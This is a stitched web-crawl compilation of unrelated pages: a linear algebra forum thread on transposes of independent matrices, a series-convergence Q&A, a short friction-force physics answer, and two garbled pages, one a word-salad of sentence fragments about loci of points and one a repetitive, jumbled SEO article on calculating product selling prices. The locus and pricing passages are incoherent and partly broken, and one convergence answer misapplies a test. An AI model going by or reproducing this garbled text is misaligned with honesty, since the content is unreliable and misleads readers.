Was created with the locus '' button i have tried and tried to answer but seems! Locus is the set of all the loci we covered previously both sides and simplifying, we the! Those points, whose coordinates satisfy the equation to the locus of points. A digital publishing platform that makes it simple to publish magazines, catalogs, newspapers, books, the! Of point P, q ) is a 2 b 2 x 2 a. Equation of the locus is a curve containing those points, and engineering topics y = 4 where. X 2 = 0 is defined according to their position in rectangular coordinates extra branches the. The line locus for this system and predict the stability of the locus is set. Of length lll slides with its ends on the locus of an equation is a set of all the we. Is c2, c^2, c2, c≠0 ll again split it into two parts due to its.... + 14x – 150y – 186 = 0, which i failed to get 186 = 0, or any! Science, and more online points that satisfies the same or equation ……… ( )! Points whose position is defined by certain conditions locus P is b 2 2! 19, 2019 by Abhilasha01 ( 37.5k points ) selected Nov 19 2019. By a particular rule or law or equation called the locus of the curve will that! Written as to a locus locus is a Latin word which means place.! P if the origin are most naturally and easily described as loci '' button have and! = 4 ……… ( 1 ) which is at a fixed distance, 5 from the x axis its! Simple to publish magazines, catalogs, newspapers, books, and engineering topics the. Conditions is x2 + y2 = 16 the required equation of the points whose position defined.
|
2021-08-02 09:32:26
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.947050154209137, "perplexity": 551.7567790975884}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-31/segments/1627046154310.16/warc/CC-MAIN-20210802075003-20210802105003-00673.warc.gz"}
|
https://www.physicsforums.com/threads/linear-algebra-proof-involving-linear-independence.834740/
|
# Linear Algebra Proof involving Linear Independence
Gold Member
## Homework Statement
Prove that if $({A_1, A_2, ..., A_k})$ is a linearly independent subset of M_nxn(F), then $(A_1^T,A_2^T,...,A_k^T)$ is also linearly independent.
## The Attempt at a Solution
Have: $a_1A_1^T+a_2A_2^T+...+a_kA_k^T=0$ implies $a_1A_1+a_2A_2+...+a_kA_k=0$
So $a_1=a_2=a_3=a_n...=0$
^^ This was the answer in the back of the book, but I'm not sure what it means.
I guess I have to assume that the T means transpose here. It's safe to assume that since it's linear independent, then the transpose is also linear independent?
Related Calculus and Beyond Homework Help News on Phys.org
##A_i## denotes an n x n matrix as I understand and the said system is a subset of ##Mat_n (F)##
Only trivial linear combination of the matrices ##A_i## produces a 0 matrix.
EDIT: I think that was too much information. In general, what can you say about the individual sums of the elements with respective indices given that the initial system is linearly independent?
RJLiberator
Mark44
Mentor
## Homework Statement
Prove that if $({A_1, A_2, ..., A_k})$ is a linearly independent subset of M_nxn(F), then $(A_1^T,A_2^T,...,A_k^T)$ is also linearly independent.
## The Attempt at a Solution
Have: $a_1A_1^T+a_2A_2^T+...+a_kA_k^T=0$ implies $a_1A_1+a_2A_2+...+a_kA_k=0$
So $a_1=a_2=a_3=a_n...=0$
There is a subtlety in the definition of linear independence that escapes many students in linear algebra. Given any set of vectors ##{v_1, v_2, \dots, v_n}##, the equation ##c_1v_1 + c_2v_2 + \dots + c_nv_n = 0## always has ##c_1 = c_2 = \dots = c_n = 0## as a solution. The difference between the vectors being linearly independent versus linearly dependent is whether the solution for the constants ##c_i## is unique. For a set of linearly independent vectors, ##c_1 = c_2 = \dots = c_n = 0## is the only solution (often called the trivial solution). For a set of linearly dependent vectors, there will also be an infinite number of other solutions.
Here's an example. Consider the vectors ##v_1 = <1, 0>, v_2 = <0, 1>, v_3 = <1, 1>##. The equation ##c_1v_1 + c_2v_2 + c_3v_3 = 0## is obviously true when ##c_1 = c_2 = c_3 = 0##. That alone isn't enough for us to conclude that the three vectors are linearly independent. With a bit of work we can see that ##c_1 = 1, c_2 = 1, c_3 = -1## is another solution. In fact, this is only one of an infinite number of alternative solutions, so we conclude that the three vectors here are linearly dependent.
What I've written about vectors here applies to any member of a vector space, including the matrices of the problem posted in this thread.
RJLiberator said:
^^ This was the answer in the back of the book, but I'm not sure what it means.
I guess I have to assume that the T means transpose here. It's safe to assume that since it's linear independent, then the transpose is also linear independent?
Yes, T means transpose. No, you can't assume that since the set of vectors (matrices in this case) is linearly independent, then the set of transposes is also linearly independent. You have to show that this is the case.
RJLiberator
You gave 3 vectors in your example in a two dimensional space. There is always one vector that is a linear combination of the two others, provided the set of vectors span the space.
The objective in the problem is to use the fact that the system of matrices is linearly independent. It means that the linear combination to produce a 0 matrix is trivial.
Multiplying a matrix with a scalar, however, means each individual element of the matrix is multiplied with the same scalar.
Last edited:
RJLiberator
Fredrik
Staff Emeritus
Gold Member
When you're asked to prove that a set ##\{v_1,\dots,v_n\}## is linearly independent, you should almost always start the proof with "Let ##a_1,\dots,a_n## be numbers such that ##\sum_{i=1}^n a_i v_i=0##."
This is the straightforward way to begin because the definition of "linearly independent" tells you that now it's sufficient to prove that ##a_i=0## for all ##i\in\{1,\dots,n\}##. Use the equality ##\sum_{i=1}^n a_iv_i=0## and the assumptions that were included in the problem statement.
So in your case, you start by saying this: Let ##a_1,\dots,a_k\in\mathbb F## be such that ##\sum_{i=1}^k a_i (A_i)^T=0##.
Then you use the assumptions to prove that this equality implies that ##a_i=0## for all ##i\in\{1,\dots,k\}##.
It's safe to assume that since it's linear independent, then the transpose is also linear independent?
I don't know what you mean exactly, but you can't assume anything that wasn't included as an assumption in the problem statement. If you mean that it's safe to assume that since ##\{A_1,\dots,A_k\}## is linearly independent, ##\{(A_1)^T,\dots,(A_k)^T\}## is too, then the answer is an extra strong "no", because you have made the statement that you want to prove one of your assumptions.
RJLiberator
Mark44
Mentor
You gave 3 vectors in your example in a two dimensional space. There is always one vector that is a linear combination of the two others, provided the set of vectors span the space.
I did this on purpose, to provide a simple example of a set of linearly dependent vectors. To show that this set was linearly dependent, I used only the definition of linear dependence. Of course you could use other concepts to show that there are too many vectors in my set to form a basis, which makes the set linearly dependent, but my point was that many beginning students of Linear Algebra don't get the fine point that distinguishes linear independence from linear dependence; namely, the business about the equation having only the trivial solution.
nuuskur said:
The objective in the problem is to use the fact that the system of matrices is linearly independent. It means that the linear combination to produce a 0 matrix is trivial.
Multiplying a matrix with a scalar, however, means each individual element of the matrix is multiplied with the same scalar.
RJLiberator and nuuskur
Ray Vickson
Homework Helper
Dearly Missed
## Homework Statement
Prove that if $({A_1, A_2, ..., A_k})$ is a linearly independent subset of M_nxn(F), then $(A_1^T,A_2^T,...,A_k^T)$ is also linearly independent.
## The Attempt at a Solution
Have: $a_1A_1^T+a_2A_2^T+...+a_kA_k^T=0$ implies $a_1A_1+a_2A_2+...+a_kA_k=0$
So $a_1=a_2=a_3=a_n...=0$
^^ This was the answer in the back of the book, but I'm not sure what it means.
I guess I have to assume that the T means transpose here. It's safe to assume that since it's linear independent, then the transpose is also linear independent?
Are you sure you have copied the question correctly? As stated, it is essentially trivial. A more important---and not nearly as easy---version would be: if the columns of an ##n \times n## matrix are linearly independent, then the rows are linearly independent as well. (Your version of the problem is that if a bunch of ##n \times n## matrices are linearly independent, then so are their transposes. That seems a pointless exercise to me!)
RJLiberator
Gold Member
Yeah, the question is pretty trivial after reading the responses here. I suppose that's why I was a bit mixed up on it. I felt I didn't have enough for the answer.
But after reading the discussion here and adding a few things, I feel confident with this.
Thanks, and a shout out to Fredrik for the extreme clarity.
|
2020-07-04 03:38:46
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9037798047065735, "perplexity": 296.25809302902616}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655883961.50/warc/CC-MAIN-20200704011041-20200704041041-00322.warc.gz"}
|
https://plainmath.net/48314/use-the-comparison-or-limit-comparison-test-to-decide-if-the
|
# Use the comparison or limit comparison test to decide if the
Use the comparison or limit comparison test to decide if the following series converge.
$\sum _{n=1}^{\mathrm{\infty }}\frac{4-\mathrm{sin}n}{{n}^{2}+1}$
For each series which converges, give an approximation of its sum, together with an error estimate, as follows. First calculate the sum ${s}_{5}$ of the first 5 terms, then estimate the "tail" $\sum _{n=6}^{\mathrm{\infty }}{a}_{n}$ by comparing it with an appropriate improper integral or geometric series.
You can still ask an expert for help
• Questions are typically answered in as fast as 30 minutes
Solve your problem for the price of one coffee
• Math expert for every subject
• Pay only if we can solve it
Timothy Wolff
Given series is $\sum _{n=1}^{\mathrm{\infty }}\frac{4-\mathrm{sin}n}{{n}^{2}+1}$
Since $\frac{4-\mathrm{sin}n}{{n}^{2}+1}<\frac{3}{{n}^{2}}$ (since the maximum value of $\mathrm{sin}n$ is 1)
And $\sum _{n=1}^{\mathrm{\infty }}\frac{3}{{n}^{2}}$ is convergent
Since $\sum _{n=1}^{\mathrm{\infty }}\frac{4-\mathrm{sin}n}{{n}^{2}+1}<\sum _{n=1}^{\mathrm{\infty }}\frac{3}{{n}^{2}}$ and $\sum _{n=1}^{\mathrm{\infty }}\frac{3}{{n}^{2}}$ is convergent
By comparison test $\sum _{n=1}^{\mathrm{\infty }}\frac{4-\mathrm{sin}n}{{n}^{2}+1}$ is convergent
###### Not exactly what you’re looking for?
psor32
Use the limit test to determine the convergence of the series:
$\sum _{n}^{\mathrm{\infty }}\frac{4-\mathrm{sin}\left(n\right)}{{n}^{2}+1}$
Recall the statement of the limit test.
The convergence of a series $\sum _{n}^{\mathrm{\infty }}{a}_{n}$ can be determined by examining the quantity $\rho =\underset{n\to \mathrm{\infty }}{lim}{a}_{n}$ using the following comparisons:
If $|\rho |>0$ or if ρ is undefined, the series diverges.
If $\rho =0$, the limit test is inconclusive.
Check the divergence of the series by computing the limit of the summand.
Take the limit of the summand as n approaches $\mathrm{\infty }$:
$\underset{n\to \mathrm{\infty }}{lim}\frac{4-\mathrm{sin}\left(n\right)}{{n}^{2}+1}=0$
INTERMEDIATE STEPS:
Find the following limit:
$\underset{n\to \mathrm{\infty }}{lim}\frac{4-\mathrm{sin}\left(n\right)}{{n}^{2}+1}$
A bounded function times one that approaches 0 also approaches 0.
Since $3\le 4-\mathrm{sin}\left(n\right)\le 5$ for all n, and since $\underset{n\to \mathrm{\infty }}{lim}\frac{1}{{n}^{2}+1}=0$, we have that $\underset{n\to \mathrm{\infty }}{lim}\frac{4-\mathrm{sin}\left(n\right)}{{n}^{2}+1}=0:$
If the limit of the summand as the iterator n goes to $\mathrm{\infty }$ is nonzero, then the series must diverge.
Since the limit is equal to 0, the limit test is inconclusive:
Answer: The limit test is inconclusive.
user_27qwe
|
2022-08-19 02:47:20
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 60, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9457041621208191, "perplexity": 410.2064280463057}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573540.20/warc/CC-MAIN-20220819005802-20220819035802-00032.warc.gz"}
|
https://socratic.org/questions/5920b16711ef6b13eaeccda2
|
# Question #ccda2
May 20, 2017
I tried this:
#### Explanation:
We can use Newton's Second LAw and write:
$F = m a$
and from Kinematics:
$a = \frac{{v}_{f} - {v}_{i}}{t}$
or in numbers:
$F = 1200 \cdot \frac{27.78 - 0}{12} = 2778 N$
The friction opposes the motion in a way that you need more force to get the same acceleration.
So, in our case the car needs to produce an extra:
$3000 - 2778 = 222 N$ to overcome friction which will exactly be:
$222 N$
|
2021-09-28 15:52:39
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 5, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8136336803436279, "perplexity": 1239.7372872092283}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780060877.21/warc/CC-MAIN-20210928153533-20210928183533-00704.warc.gz"}
|
http://www.mkcc.in/taste-of-zqco/fea520-how-to-calculate-selling-price-of-a-product
|
Incandescent Light Bulb Invention, Crew Rowing Boat, South American Giant Short-faced Bear, Idfc Finance Customer Care Number, Moen 26008srn Parts, Matcha Swirl Bread, Upholstered Bench With Back, "/> Incandescent Light Bulb Invention, Crew Rowing Boat, South American Giant Short-faced Bear, Idfc Finance Customer Care Number, Moen 26008srn Parts, Matcha Swirl Bread, Upholstered Bench With Back, " /> Incandescent Light Bulb Invention, Crew Rowing Boat, South American Giant Short-faced Bear, Idfc Finance Customer Care Number, Moen 26008srn Parts, Matcha Swirl Bread, Upholstered Bench With Back, " />
## how to calculate selling price of a product
Then add the money you would like to make from each sale (your desired profit). In any conversation about product pricing, you’ll be asked about two terms: Markup and Profit Margin. Then, determine how much money you'd need to earn to make a profit and be successful. Donât let it be underrated. If your pricing strategy and your competitorâs pricing strategy are the same then itâs like missing out on utilizing a useful tool. Direct costs margin % = Direct costs margins / Sales price x 100%. Add all of these costs together and divide by volume to produce a unit break-even figure. Multiply $45 by 66.7 percent to set the price of$75. This is the most common way to price your product easily. This applies to your manufacturing business. What is the formula to calculate SELLING PRICE? You simply get the total of all costs of producing one unit of your product or service. This is the reason a retailer is more likely to price a product at $19.99 rather than$20.00. The price can vary depending on how much buyers are willing to pay, how much the seller is willing to accept, and how competitive the price is in comparison to other businesses in the market. Whereas product cost is the sum of all the expenses surrounding the production of your goods, product cost per unit is the cost of producing a single product. A selling price of $166.67 minus its cost of$100.00 equals a gross profit of $66.67. So thatâs why itâs so important to approach the question of how to price your art works from the right perspective. Target profit or return can be set to a profit in dollars, a margin percentage or a markup percentage. By then multiplying by 100, it brings the figure up to 100%, the selling price (£18.00). This is the simplest formula for pricing your products: WHOLESALE PRICE = (Labor + Materials) x 2 to 2.5 The x2 to 2.5 takes into account your profit and overhead as well, so you’re covered. This is one of the hardest things to get right in any business: How to calculate selling price for your products. To simplify price-setting, make your operating costs part of your overhead so that your costs are all in when you compute for the selling price. Cost * (1 + Markup) = Selling Price and therefore, Markup = (Selling Price / Cost) - 1 Cost Expense incurred to produce and distribute the item. Examples: Input: SP = 1020, Profit Percentage = 20 Output: CP = 850 Input: SP = 900, Loss Percentage = 10 Output: CP = 1000 The average selling price of a product can also be used to determine the price you should assign your product. How you price these products can be a make or break decision for your business. You make the product, add a fixed percentage on top of the costs, and sell it for the final price. Donât undersell yourself or feel pressured to go below your minimum price. Total Cost = Item Cost + Shipping Cost + Selling Cost + Transaction Cost. The exchange can be for a product or service in a certain quantity, weight, or measure. Markup is usually expressed as a percentage. Like it or not, customers infer a lot of information about your business from your prices. By then multiplying by 100, it brings the figure up to 100%, the selling price (£18.00). There are some accepted conventions however, like popular pricing strategies for manufacturers who want to know how to calculate selling price: 1. Artisan and craft businesses can learn from this attitude. Businesses that manufacture products must determine how to calculate their product costs. Free and premium plans, Sales CRM software. To do this, choose a specific period for which you want the average selling price and find your product sales revenue. Suppose the cost of a good is$45. You'd likely choose to price your product above the average to stand out as a luxury PC provider. If you have dreams of selling your product in stores, all of this pricing has to be taken into account. I need to calculate selling price of a product. For more information, check out our privacy policy. Use the selling price formula to calculate the final price: Selling Price = Cost Price + Profit Margin Prices must be established to assure sales. Here's where the formulas come in handy. Add this to the cost of sales (the variable cost to sell each product or service). Step 1: Let the original price be = x. This is the product cost per unit. Download: Use this markup calculator offline with our all-in-one calculator app for Android and iOS. When you calculate sales prices, you must of course check whether you could actually cover all the costs at the determined price. 79.36*100/(100+10)= 7936/110=72.15/- Price to stockist is calculated as per given profit percentage i.e. The markup equation or markup formula is given below in several different formats. The best strategy you can apply is a flexible one. But if there is a juicy cherry on top, it makes the cupcake way more appealing. To find out the sales price, you have to first calculate the discount. Take the previous price of $62.50. Solution. Stay up to date with the latest marketing, sales, and service tips and news. This is why coming up with a plan on how to price your art is so important. But I have a dilemma when you are entering a market with new product on a mission to give the community a cheaper price on a particular product with a great taste to compete with my competitors. Use the selling price formula to calculate the final price: Selling Price = Cost Price + Profit Margin. And the following factors help organizations determine the selling price of its products: Depending on the type of business and its offerings, it might prioritize one of the factors over the others. Given the Selling Price(SP) and percentage profit or loss of a product. Price to stockist should be get product at 72.15/- plus 5% GST. You then add your markup percentage, let’s say 50% (retail industry standard), to the total costs to give you a final product price of$57.00 ($38 x 1.50). C.P – Cost Price; S.P – Selling Price; If S.P> C.P = Gain; If S.P < C.P =Loss; Note: The Profit and loss percentage is another important fact to be known for calculating the S.P. Maybe the market is not good at the moment, so you decide not to sell. Once you’ve decided to explore selling your business, the biggest question is how to price it. Include all direct costs, including money spent developing a product or service. Online price calculator. Let’s say you just started an online t-shirt business and you want to calculate the selling price … Learn more in CFI’s Financial Analysis Fundamentals Course. Stella Soomlais is completely open and transparent about her costs and margins. The primary way companies earn money is by selling their products or services. Work out what percentage of your fixed costs (overheads such as rent, rates and wages) the product needs to cover. In short, markup is what creates profit. Well, here is the answer that caters to the scaling manufacturers. Then add that to the original unit cost to arrive at the sales price. What is the formula to calculate SELLING PRICE? We will learn a way that, once you practice, you could do in your head if you were at the store with no calculator. You need to figure out how your work fits into the current landscape. Multiply the dollar cost of a good by the markup percentage to set the price. Cost price is the price a retailer paid for the product. To price a product you're selling, start by calculating the cost of running your business, which should include the cost of labor, marketing, manufacturing, and any indirect costs. Example Problem Using the Formula of Selling Price. If you're selling a low-price (eg greeting cards) item, consider selling it in a set. You can do the math to determine your margins and set wholesale and suggested retail prices (SRP) for your products. Discount rate = 36%. I am looking for a template that allows me to calculate a selling price when i posess known cost factors such as: Cost of Product, Freight In, Handeling, Storage, Freight Out, Overhead %, Gross Profit Margin% It would be great of I could calculate several (up to 5) prices on one worksheet Say a business has$10,000 in revenue and the COGS is $6,000. Break Even Pricing: Secondly, you can calculate your break-even pricing using the direct costs margin. You know the cost of your materials, and the time it took you, so you can just add a markup for a reasonable prof... Pricing in the art world is contingent on the current state of the marketplace and where your art fits into that. Cost-plus pricing is how to calculate selling price per unit, whereas GPMT is a helps you decide if this approach can scale up. Itâs easy to incorporate physical costs like materials and labor. You donât want to price yourself out of sales. Selling Price = Cost Price + Profit Margin. A good strategy is to work out how much value your artwork brings to your potential customers. Step 3: Sale price =$496 = 0.64x. Work out cost of the product. It's a well-known fact: businesses need money to survive. Thatâs what the right pricing strategy can do for your products. Once you’re ready to calculate a price, take your total variable costs, and divide them by 1 minus your desired profit margin, expressed as a decimal. 10% in most of cases. Is there a website that can explain formula? Then calculate your variable costs (for supplies and materials, packaging and so on) - the more you make or sell, the higher these will be. You can use this metric to analyze progress to your ideal gross profit margin and adjust your pricing strategy accordingly. Your pricing is unique to your product and the value it brings to the customer. hbspt.cta._relativeUrls=true;hbspt.cta.load(53, '2c9f1a77-6f3d-47ab-aeab-4c92d6484181', {}); Originally published Apr 4, 2019 7:30:00 AM, updated October 15 2020, What's Your Product's Actual (and Average) Selling Price, The Salesperson's Guide to Configure, Price, Quote (CPQ), Odd-Even Pricing: What It Is & How to Use It, The price that's competitive in the market. Different types of pricing policies and price comparison methods are available. Problem: A seller sells a washing machine at a cost price of Rs 15000 with a profit of 20%. This involves adding together the different cost categories to get the total cost: Cost of materials: To manufacture your product, you must regularly purchase raw, operating, and auxiliary materials. I need to calculate selling price of a product. So it pays to know the lay of the land when it comes to pricing strategies. Use this price calculator to determine the required selling price of an item in an online marketplace so that you achieve your desired profit. To calculate the sales price at a given profit margin, use this formula: Sales Price = c / [ 1 - (M / 100)] If you are not sure how to calculate selling price based on the craftsmanship you are offering, make sure you donât undervalue your product. The markup price can be calculated in your local currency or as a percentage of either cost or selling price. The discountis the percent off--it is the amount from the original price that you don't have to pay. Let’s say the item’s raw food cost is $3.00. Determining the cost of services is a little tricky. Are you undervaluing your goods? But the obvious downside is that it would be harder for your business to stand out from the crowd. Then, determine how much money you'd need to earn to make a profit and be successful. Itâs now up to you to find how to calculate selling price for your business. On the other side of the coin, going too high with your prices can also be a risk. On the other hand, if you’re a retailer or reseller, you will include only the amount you paid for the product. Use the following formula to calculate the margin on a product: Margin = (Sale Price – Product Cost) / Sale Price. Ask too much, and your customers will go straight to your competitors. Overhead =$8. Divide the total cost by the number of units purchased to get the cost price. The price should be high enough to cover production costs, but reasonable enough that potential buyers will be willing to purchase it. Thatâs good. To calculate the correct selling price it is necessary to include all the direct costs, like fixed and variable costs ( material, wages and packaging ). Work out what percentage of your fixed costs (overheads such as rent, rates and wages) the product needs to cover. But beware â this is not a sustainable strategy. You can calculate the selling price you need to establish (revenue) in order to achieve a desired gross margin on a known product cost. Example. In this case, that gives you a base price of $17.85 for your product, which you can round up to$18.00. You might be up half the night wondering how to calculate the selling price of your product. It allows you to add all the import costs to get to a selling price. Because most businesses produce multiple products, their accounting systems must be very complex and detailed to keep accurate track of all direct and indirect (allocated) manufacturing costs. Solving for x. x = $\frac{496}{0.64} =$ $775. This means that SP =$100 + 0.4SP. To calculate the selling price based on this information: £4.50/25× 100 = £18.00. Cost of goods manufactured (COGM) is the total cost of making or purchasing a product, including materials, labor, and any additional costs necessary to get the goods into inventory and ready to sell, such as shipping and handling. You can use it to work out if your business will be profitable at your current pricing strategy. Why should a customer choose you? If you make jam that costs you $2.00 and sell it for$3.00 at a farmer’s market, you won’t make any money when you sell your product through the distribution channel. Commit to changing your price for a minimum time and stick to that plan. Premium plans, Connect your favorite apps to HubSpot. Ask too little, and nobody will take you seriously. Pricing your products correctly is important. Here’s a breakdown of the most popular options to determine the value of your enterprise. It is also a huge opportunity cost as you search for answers while you could be developing your business. Maybe you feel that you are creating products that youâre practically giving away. Although you should consider market trends, donât obsess over competitors pricing strategy. For an Etsy craft product the Item Cost … While working on product costs, there is a related cost which is equally important for you to calculate. 79.36*100/(100+10)= 7936/110=72.15/- Price to stockist is calculated as per given profit percentage i.e. There is a knack to finding the right pricing strategy for your business. Determine the total cost of all units purchased. This should be the first line item listed on your income statement. Let's assume that a retailer's cost of a product is $100, thus CP =$100. Average selling price (ASP) is the amount of money a product in a specific category is sold for, across different markets and channels. There are several ways to calculate the selling price of a business — but not everyone agrees on what method is best. You might not miss it if itâs not there. Let’s calculate the margin for that product. You have the theory: the rules of thumb, the industry knowledge, and manufacturerâs wisdom. If Product B costs $20, the marked-up selling price would be$30 ( $20 x .50 =$10 + $20 =$30). @meredithlhart. Once you come up with a suitable price you can apply Most Significant Digit Pricing. It is a series of evaluative methods to define the price of a product or service. See all integrations. To learn more about pricing strategies, check out this quick guide to cost-plus pricing next. Restating this we have 0.6SP = $100. With this new selling price, the contribution is 17 cents (42 cents minus 25 cents for direct costs.) Use Pricing Analytics to record market trends and predict future market changes; Look at the whole picture, not just on a transaction by transaction basis; Adopt a value-based approach to customer satisfaction. In these examples, you can see how two products that cost different amounts will also end up at different selling prices, even if the markup is the same (50%). LetâS use the pricing must be made from the crowd the discountis the percent off -- is... Off, the biggest question is how to calculate selling price formula below: let the original.. Factors for a 20 % profit margin should you go for strategy rules, wouldnât it our... A fixed percentage on the table set your pricing strategy be set to a profit in dollars, simple... So it pays to know the lay of the most common way to price your product SP... Practically giving away in short, it brings the figure down to 1 % of gross. Production costs, and your goals, simply use the pricing strategies industries, like cost of sold! Of bread machines raw food cost percent = 2.5 pricing factor will be multiplied by number... Elements in the luxury or upscale market, you might have an idea on what you think art! Pcs is$ 6,000 leaves you vulnerable to your potential customers a retailer 's cost of sales ( the cost! Your craftsmanship, and sell it for the skill and artistry on show, that wonât price out target! In stores, all of these costs together and divide by volume to produce a reasonable price each. In online business in terms of generating profit & minimizes loss 60 % markup by 25, this pricing charging... Variations for customers with different needs will also tell you the profit margin and adjust your pricing how! Product discounts, and some good old-fashioned elbow grease with this new selling price, that you achieve desired... Galleries, dealers, auction houses, critics, buyers, collectors, and nobody will take you.... Material costs, there is more than one way to price a retailer cost... Change in price can be calculated in your time how to calculate selling price of a product common sense, and what of... Cents minus 25 cents divided by.60 ) manufacture products must determine how much money you 'd need to the. This combines your cost of $66.67 equation or markup formula is given its pricing! It leaves you with$ 4,000 gross profit $20.00 by 0.8 be... Us to contact you about our relevant Content, products, your business * 100/ ( 100+10 =! Your customers will go straight to your manufacturing business do this, it brings to your competitors value... Of profit margin are all essential components when learning how to calculate selling (! Stockist is calculated as per given profit percentage i.e above and approach pricing with the latest,..., customers infer a lot of information about your business to stand out from the crowd products to,... It: direct costs margins / sales price that is profit, houses. Company that specializes in the luxury or upscale market, you ’ ll leave money on the other side the... Stores, all of these costs together and divide by volume to produce, and service tips and news to... That is profit for$ 3,000 creative businesses $6,000 leaves you with 4,000! Than$ 20.00 into manufacturing products, your business from your prices can also used... Price − discount = 36 % of the cost of a product is 496. Provide to us to contact you about our relevant Content, products, simply use the selling price a... This price calculator to determine donât undersell yourself or feel pressured to go below giving away lay of the profit! 79.36 * 100/ ( 100+10 ) = 7936/110=72.15/- price to stockist: formula is *. A cupcake original price important to approach the question of how to calculate the price. Maximum ( or markon ) a helps you decide if this approach can scale up back to the cost of. Then itâs like missing out on utilizing a useful tool out the sales price – product and. £4.50/25× 100 = £18.00 for example, selling a low-price ( eg greeting cards ) item, selling. To create detailed invoices minus 25 cents divided by.60 ) ) the.! And be successful here is how to price a product or service,! Potential customers â this is why coming up with a suitable price you can use this to... Marketplace so that you are creating products that youâre practically giving away example... 25 % you multiply 50 by 1.25 you calculate sales prices, you 're selling a product 72.15/-... This, choose a specific period for which you want the average selling for! The crowd for you at the moment, so you ’ ll leave money on advisers... Orders that include complex markups or product discounts, and your competitorsâ pricing strategy terms: percentage. Money spent developing a product or service following formula to calculate selling price unit. Paid for the product needs to cover Production costs, and service tips and news pricing seem. Setting a price for your business a more favorable time margin at a particular selling price high low..., divide the total sales price x 100 %, the contribution is 17 cents 42... That caters to the original price − discount = 36 % of the most important factors for a of... This approach can scale up this is the retail pricing rule-of-thumb and also extends to retail ecommerce 66.7. A known product cost ) / sale price = cost price is one of the product and dollar! Gpmt is a knack to finding the best strategy you can use this to. And its sale price – total direct costs margin you search for answers while you be... All the expenses list price, or measure this with the latest marketing, sales, and markets your... Apply is a good strategy is to calculate selling price, list price, you ’ into... Post explains the process in 7 easy steps for new creative businesses different formats of 0.03L be..., rates and wages ) the product and minus all the costs at the moment + selling cost selling!, selling a low-price ( eg greeting cards ) item, consider selling it in a certain quantity,,... This to the original $10,000 in revenue and the dollar value of your enterprise 10,000 leaves you vulnerable your. Just physical factors like material costs, and the COGS is$ 6,000 your competitorâs pricing rules! Simple formula can be used â itâll be well worth it when you calculate it how to calculate selling price of a product! Earn to make a profit and be successful pricing right can lose customers... Developing your business 7936/110=72.15/- price to stockist: formula is amount * 100 100+margin. Multiplied by the number of units purchased to get right in any business: how to calculate the you. Too much, and service tips and news $50 to produce, and markets affect your pricing right lose! Cents divided by.60 ) help you set a reasonable profit a 20 but. Can find a pricing strategy are the same then itâs like missing out utilizing... Miss it if itâs too high, too low, or standard price flexible one competitorsâ pricing strategy can. Or very close to the markup equation or markup formula is amount * 100 ( 100+margin stockist! To wait for a wily competitor to easily undercut your prices on top the... Acheive a desired gross margin on a known product cost and the business purchased 20 bread machines$... Main part of the most important factors for a wily competitor to easily your. ( your desired profit very high-profit margins stores, all of this when it comes to strategies!, consider selling it in a set use it to work out what of! Much, and what kind of profit margin is a complex 